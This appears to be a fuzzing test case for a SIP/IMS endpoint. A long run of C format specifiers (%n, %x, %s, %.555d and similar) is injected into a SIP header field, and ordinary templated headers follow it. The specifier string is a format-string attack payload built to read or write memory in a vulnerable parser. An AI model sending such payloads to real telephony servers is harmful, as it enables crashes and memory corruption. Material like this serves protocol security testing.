%s%n%.127d%.*s%.555d%n%*d%*d%.*s%*s%n%n%*d%x%.555ds%%.*s%.*ss%%*.*s%*d%n%.555d%x%n%s%n%x%n%*d%.127d%*d%.555d%.127ds%%*s%n%.*s%.555d%s%x%.*s%ns%%x%.555d%.127d%*.*s%*d%*ss%%.555d%x%.555d%x%s%.127d%.127d%n%n%.*s%.*s%.*s%*.*s%*s%.127d%x%x%*s%*s%.127d%n%*s%.*s%.555d%n%.127d%*s%.127d%*d%.555d%*.*s%s%s%s%x%.127d%.127d%n%x%.*s%.127d%*s%*d%*d%n%*ds%%n%*d%*s%.127ds%s%%s%*.*s%n%*ss%%*s%*s%.127d%x%*s%*s%.127d%*d%*.*s%n%n%.555d%*d%*s%n%n%*s%*d%*.*s%x%x%.555d%n%.555d%.127d%.555d%*d%.*s%*.*s%n%*s%.*s%.127d%x%.*s%.*s%s%n%*d%.*s%*d%n%x%*.*s%xs%%s%.*s%x%*d%*s%*s%.555d%s%n%.555d%*d%.555d%x%*d%.127d%s%*.*s%*.*s%.*s%.555d%*.*s%x%.*s%*.*s%x%n%x%.*s%x%.127d%.127d%*.*s%x%ns%%n%n%x%*s%s%*.*s%n%*d%*s%*d%s%.555d%x%.*s%n%.555d%ns%%n%s%n%.*s%.555d%.555d%.*s%x%x%*d%x%n%x%x%*.*s%n%n%s%*s%*d%x%x%x%*d%n%s%.*s%s%x%x%x%n%x%*.*s%.555d%n%.127d%n%*s%.*s%x%*d%s%*d%n%x%x%*.*s%.555d%.127d%x%.127d%n%n%.127d%x%*s%.*s%.*s%s%*d%*.*s%x%x%*.*s%.555d%.555d%*s%x%*.*s%n%*d%.555d%x%*s%*d%x%.555d%.127d%x%*.*s%n%.555d%ns%%.*s%.555ds%%*s%.555d%n%.127d%.555d%xs%%*ds%%.555ds%%n%.127d%.555d%.127d%.555d%xs%%.127d%*d%.*s%*d%*.*ss%s%%n%x%*s%n%*.*s%n%*s%*d%s%n%x%.127d%.*s%.555d%n%*s%x%s%.127d%*s%.555ds%s%%.127d%*s%.127d%.*s%.*s%.127d%x%*s%x%x%x%x%*d%*.*s%.*s%n%.555d%.555d%.127d%.127d%s%x%n%*d%*.*ss%%*s%*ds%%.*ss%%x%x%.127d%*d%n%*s%n%n%*.*s%s%n%*s%*s%*s%.*s%xs%%xs%%*s%*.*s%n%.127d%x%*d%n%x%s%*s%x%n%s%x%ns%s%%x%s%*d%s%x%x%*d%ns%%n%x%.*s%*.*s%ss%%*.*s%n%*d%.555d%x%n%x%.555d%.127d%x%n%x%.127d%.*s%n%.*ss%%.*s%.*s%.127d%ss%%*d%.127d%x%n%n%.*s%*s%n%.555d%n%*ss%%x%s%xs%%n%.555d%*.*s%x%.*s%s%*.*s%n%x%*s%.127d%*.*s%*.*s%x%.*s%*d%n%.555d%.555d%s%.*s%ns%%xs%%.*s%n%.127d%.555d%.*s%x%*.*s%x%*s%*.*s%n%*d%s%.555d%x%n%*.*s%n%n%x%*.*s%.127d%n%.127d%*d%.127d%*s%ss%%.*s%.127d%n%x%s%*.*s%.555d%.555d%.127d%*.*s%.127d%*d%.555d%x%*.*s%.555d%.*s%*d%*s%xs%%x%*d%*.*s%.555d%.555d%.127d%ns%%.127d%.555d%*d%x%s%.555d%.127d%x%x%.127d%*.*s%*d%.127d%n%.*s%*.*s%*d%.127d%.555d%n%x%n%.127d%*.*ss%%n%x%*.*ss%%.127d%*d%n%xs%%.555d%x%.555d%.127d%x%*d%.127d%.555ds%%n%*d%n%s%.555d%n%*d%x%n%.127d%*.*s%*.*s%.127d%*d%n%n%n%*s%n%x%.555d%n%n%x%*s%.555d%*d%n%.*s%n%s%x%*s%x%*s%s%s%.555d%n%n%*ss%%.127d%.*s%x%.555d%n%n%ns%%.*s%.*s%s%.555d%n%.127d%.127d%*d%n%.555d%*.*s%*.*s%n%*s%*d%x%x%x%x%*s%x%*d%*ss%%*d%.555d%n%*.*s%x%x%*s%*.*s%s%*s%.*s%.555d%n%*s%x%*.*s%.127d%x%n%n%s%n%*.*s%*.*s%x%*.*ss%%.*s%.*s%x%.555d%x%*.*s%n%n%n%*.*s%n%x%.*s%.*s%*.*s%*.*s%x%x%.555d%ss%%*d%.127d%x%*d%.555d%.127d%*.*s%x%*d%x%s%*d%n%.127d%.127d%*ds%%.127d%ns%s%s%%x%.555ds%%.127d%.127ds%%xs%%x%n%*.*s%.*s%*d%.555d%x%x%n%.*s%x%x%x%n%*d%x%.555d%*d%*.*ss%%x%x%*s%n%.555d%x%x%*d%n%*s%xs%%*s%.127d%.555d%.127d%ns%%.*s%*.*ss%%ns%%n%n%n%.*s%.127d%*.*s%.127ds%%.127d%*.*s%*s%n%*d%n%.127d%.*s%*s%x%*.*s%n%*d%n%.555d%n%*s%.555d%*d%*.*s%x%*s%x%*d%*d%n%ss%%*s%*.*s%s%*ss%%*s%n%n%.*s%*ss%%*s%n%*.*s%*.*s%x%*s%*.*s%.*s%.*s%*.*s%n%*s%s%.555d%x%.127d%*d%x%n%.*s%.555d%x%x%.*s%x%.*s%s%.127ds%%x%x%*d%*d%n%.*s%ns%%.127d%*ds%%.555ds%%*d%x%s%n%.555d%.555d%n%s%*d%.555d%x%n%n%xs%%.127d%*ss%%*s%*s%n%ss%%*ss%%s%n%*.*s%x%x%x%n%*d%*.*s%.555d%.127d%*d%x%.*s%*s%ns%%x%.555d%s%x%n%*s%xs%%.555d%*.*s%x%x%*s%*s%*.*s%.127d%*.*s%n%*.*s%*s%x%*.*ss%s%%*d%.127d%x%n%n%x%*.*s%.*s%.127d%.555d%n%.*s%*s%n%x%n%x%.555ds%%*s%*ds%%.*ss%%*.*s%x%n%.127d%x%*.*s%x%s%*d%*s%.127d%x%.555d%*s%s%n%n%x%.*ss%%*.*s%n%*s%n%*.*s%n%.555d%s%x%s%n%*ss%%*s%*d%*d%n%n%.555d%s%.*s%*d%x%*.*s%.127d%*.*s%.127d%x%x%.555ds%%.555d%x%x%s%x%.555d%x%x%x%s%.*s%.*s%x%*ss%%*s%.127d%*s%n%*d%*d%*s%s%n%n%n%*s%x%s%*s%x%.*ss%%xs%%*.*ss%%.555d%xs%%.*s%*s%*s%n%s%*d%n%s%*.*s%s%.*s%*s%x%x%.127d%*s%.555d%*.*s%*d%*s%*d%.*s%x%n%.127d%*.*s%*s%*ds%%*s%x%s%*d%s%.555d%s%.555d%s%.127d%.555d%.127d%s%.555d%x%.127d%.127d%.*s%n%.*s%.127d%x%*s%s%*.*s%.*s%.555ds%%.*s%x%n%n%.555d%*s%s%*s%*d%.555d%.127d%.*s%.555d%s%.*ss%%.127ds%%*s%n%.127d%.127d%s%.*s%s%.*s%*d%.127d%*d%n%*s%.127d%s%n%.555d%n%*s%x%.*s%.*s%*d%*.*ss%%.555d%n%ns%%x%n%x%.555d%.555d%.555d%s%*s%n%s%*s%s%n%.*s%*s%x%*.*s%.*s%.127d%s%.555d%x%.127d%.555d%n%xs%%s%*.*s%*s%.*s%*d%*d%n%x%.*s%n%s%x%ns%s%%*d%.555ds%%*d%*s%.*s%*.*s%x%.555d%.555d%*d%.*s%*s%*.*s%*d%*.*s%.555d%s%*d%.*s%s%*s%*d%*.*s%.127d%*.*s%x%.127d%*s%*d%.127d%xs%%.*s%*.*s%.555d%*.*s%*s%*s%ss%%.*s%x%*d%n%n%*s%*d%s%.*s%*d%.127d%ns%%.*ss%%.*s%x%*s%s%.555d%n%*.*s%s%n%.*s%n%.555d%x%s%x%n%n%*.*s%.*ss%%n%.555d%x%.127d%.555d%*d%n%*s%s%n%.127d%*.*ss%%n%*d%n%x%*d%n%*.*ss%%.555d%x%x%.555d%*s%xs%%.127d%n%n%s%n%*d%s%.555d%.555d%s%s%n%n%s%ss%%.555d%.*s%.*s%x%.*s%s%ns%%.555d%.127d%x%.127d%*.*s%.*s%n%n%n%s%*s%.555d%n%n%*.*s%*d%s%.*s%.*s%*s%x%.127d%x%n%s%.555d%n%.555ds%%n%*ds%%n%.*s%n%s%.*s%.*s%*ss%%*.*s%x%.*s%.127d%n%*.*ssip:[IP]:[PORT]>
P-Preferred-Identity: "linfeng" <sip:[From_User]@[Server_Uri]>
P-Access-Network-Info: 3GPP-UTRAN-TDD; utran-cell-id-3gpp=00000000
Privacy: none
User-Agent: Fraunhofer FOKUS/NGNI Java IMS UserEndpoint FoJIE 0.1 (jdk1.3)
Allow: INVITE,ACK,CANCEL,BYE,MESSAGE,NOTIFY
Content-Length: 0

